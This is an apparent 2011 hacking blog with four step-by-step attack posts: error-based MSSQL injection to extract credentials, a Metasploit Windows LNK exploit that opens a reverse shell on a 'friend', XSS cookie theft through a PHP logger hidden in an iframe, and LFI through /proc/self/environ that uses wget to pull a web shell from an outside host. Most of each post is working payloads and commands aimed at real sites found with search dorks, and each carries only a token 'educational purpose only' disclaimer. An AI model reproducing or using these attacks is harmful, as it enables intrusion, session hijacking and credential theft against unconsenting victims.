Thursday, November 3, 2011

MSSQL Injection


MSSQL Injection

Ex: google dork
inurl:.asp?id=
find a result like :
http://www.somesite.com/some.asp?ID=12
Now to check if it is vuln or not

insert single quotation ' at the last :
http://www.somesite.com/some.asp?ID=12’
you get error like this:
-------------------------------------------------
Error:Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/some.asp, line 86      
-------------------------------------------------
Then you can proceed

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,system_user)

(* here you can observe that we are trying to convert but it doesn’t happen which inturn shows the db name that it cant convert into int).

So it shows error , by showing the db name  like:
--------------------------------------------------
Error: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'usr' to a column of data type int.
/some.asp, line 86
---------------------------------------------------------------
In the error it shows some db name as “usr” .
Now
We try to bring all the available tables in a database :

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables))
(here information_schema is the database , this you can find in myphp).
We get error like :
----------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error: Syntax error converting the nvarchar value 'galery' to a column of data type int.
/some.asp, line 86
-----------------------------------------------

(here table name is galery)

But no login credentials will be in the galery table ,To find the Second table name

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('galery')))

we get table name as users
now to find columns in users table:

http://www.somesite.com/site.asp?ID=12+and+1=convert(int,select+top+1+column_name+from+information_schema.columns+where+table_name='users'))

we get this

-----------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error: Syntax error converting the nvarchar value 'username' to a column of data type int.
/some.asp, line 86
-----------------------------------------------
To find second column folow the above step like finding the second table name
Now we need to find the values in the table with columns username and password

http://www.somesite.com/some.asp?ID=12 and+1=convert(int,(select+top+1+username+from+users))
 same as like for finding value in password field too.
Got it.?

[ * Warning : Im not responsible for your actions , this is for educational purpose only . ]

Tuesday, October 25, 2011

Windows lnk Exploit


Hack the system using the windows lnk exploit:

Update metasploit.
Goto the prompt and goto framework

Then type:

#./msfconsole

Msf>prompt opens..

The search for the exploit windows lnk.

Msf>search lnk

Then it shows the exploit

exploit/xxxxx/xxxxxr/xxxxx_dllloader

then type:
msf>use exploitname(type above exploit)

set SRVHOST  tat is your local ip to get conection back
.
Then set payload

Shell/reverse_tcp payload works mostly

so type:

msf>set payload windows/metxxxxx/xxx_tcp
then set LHOST as your local ip

then type:

msf>exploit

you will be shown a url or address with port number..give it to ur friend
tada !
wait for the reverse connection.
---------------------------------------------------
Warning: Im not responsible for ur actions , just for educational purpose only

Cookie Grabbing using XSS


XSS means Cross-site Scripting is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users.

There are two types of XSS : Non-Persistent and Persistent.
If u need to know about persistent and non-persistent click here .

Now ..
Search for vulnerability in a site: its on you
This is a simple example here:
<sript>alert(“hi”);</script>


Make sure that you have a site where the cookie needs to be uploded..
(Where a link has to be sent and script executes )
Upload the below php script in your site ex:1.php

<?php

$cookie=$_GET[‘cookie’];     //storing cookies in a variable called $cookie.
$file=fopen(“cookies.txt”,”a”);  //opening a file called cookies.txt with append mode.
fwrite($file,$cookie.”\n\n\n);
fclose($file);
?>

Save it as “ 1.php

Now the url looks like : www.your_site.com/some_folder/1.php

Find vuln in a site then put it like this below :

http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>

 now send this link but,mostly people wont click it because they find this url very suspicious.
So u need to mask it

Ex:

<iframe
src="http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>" width="1" heigth="1"></iframe>
**
Now put this script in file called iclick.php .

Now your url looks like www.your_site.com/folder/iclick.php

Send this link to your friend or anyone else ask….(social engineer) to click on this link..
Tats it the cookies will be stored in cookies.txt file.
(download cookie editor addon and go on wat u want to do).
-------------------------------------------------

Warning: *** Im not reponsible for your actions. This is just for educational purpose only.

Tuesday, October 18, 2011

LFI (Local File Inclusion)


LFI bounce using chunked transfer encoding


Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.
The vuln. Code looks like :

<?php
   $file = $_GET['file'];
   if(isset($file))
   {
       include("pages/$file");
   }
   else
   ……….
    ……..       
   ?>

Here from the code you can observe that its taking or including the file from locally.
To get LFI vuln sites use dork like :: inurl:php?id=*.php
The “ *.php” means that any file name with extension .php
Ex: inrul:php?page=contact.php, contactus.ph etc.
Or inurl:.php?file=somefile.php
(* im not Responsible for any of the actions for what you do , Just Educational purpose only)
There are two ways : Manual and automated.

MANUAL way for LFI:

proc/self/environ method:

 check for vuln site same as above

then:

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

http://www.website.com/view.php?page=../etc/passwd

we got error and no etc/passwd file.

*so we go more directories up

http://www.website.com/view.php?page=../../etc/passwd

If you get like:


 we succesfully included the etc/passwd file.

The check for /proc/self/environ (in place of /etc/passwd) we get message like :

The we need Tamper data addon on firefox :

Choose Tamper and in User-Agent filed write the following code :

<?system('wget http://site.com/shel.txt -O shel.php');?>

Then submit the request.

(*here shel.txt must contain the shel code where we are getting from other site using wget command*)

Tada !. shel uploaded. J

Warning: I am not responsible for your actions , please be careful.this is for educational purpose only.
--------------------------------------------------------------------------------

Automated:

now remove the file name in the url and replace with “ ../ “ (without quotes)
if you get error like ::

Warning: include_once(../) [function.include-once]: failed to open stream: Inappropriate ioctl for device in /home/sitname /public_html/index.php on line 10

Warning: include_once() [function.include]: Failed opening '../' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in/home/sitename/public_html/index.php on line 10


It is vulnerable to LFI


Now to attack :
You need a python script called “ fimap “ which can be downloaded from google
U need python installed to execute it.

Open cmd prompt goto the folder where fimap.py script is present and type ::
 “ fimap.py –u www.site.com/file.php?page=file.php

( -u :-  option for scan if vuln exists or not)

It tests for injecting a file where it is vulnerable : looks like this



Here from the above pic u can see at the bottom with : “ [1] /proc/self/environ “
0    (0- Clean/readable , 1- writable)

Now to exploit :: type:

fimap.py –x www.site.com/file.php?page=file.php “

 (-x : to exploit ; -u : scan for vuln).

Now you will find like this :



Choose domain , well here u need to choose a number here my option is “9” ,the thing here is the fimap stores the history of successful exploiting . so choose number corresponding to the domain which u have scanned.
After that it asks for options again to choose type vuln script (choose the number ,if there is only one script the type 1).

Then again it asks for type of available attacks : they are:

1.spawn fimap shell

2.pentest monkey reverse shell

Select option 1.

It will successfully inject

Tada !  you get the command prompt of the host.

( as for pentest monkey shell ,you need netcat and an open port to get the connection back.)
Warning: I am not responsible for your actions , please be careful.this is for educational purpose only.
You hardly find LFI vuln sites ,you need work ur ass off to get the sites.
--------------------------------------------------------------------------------------------------------

Twitter Delicious Facebook Digg Stumbleupon Favorites More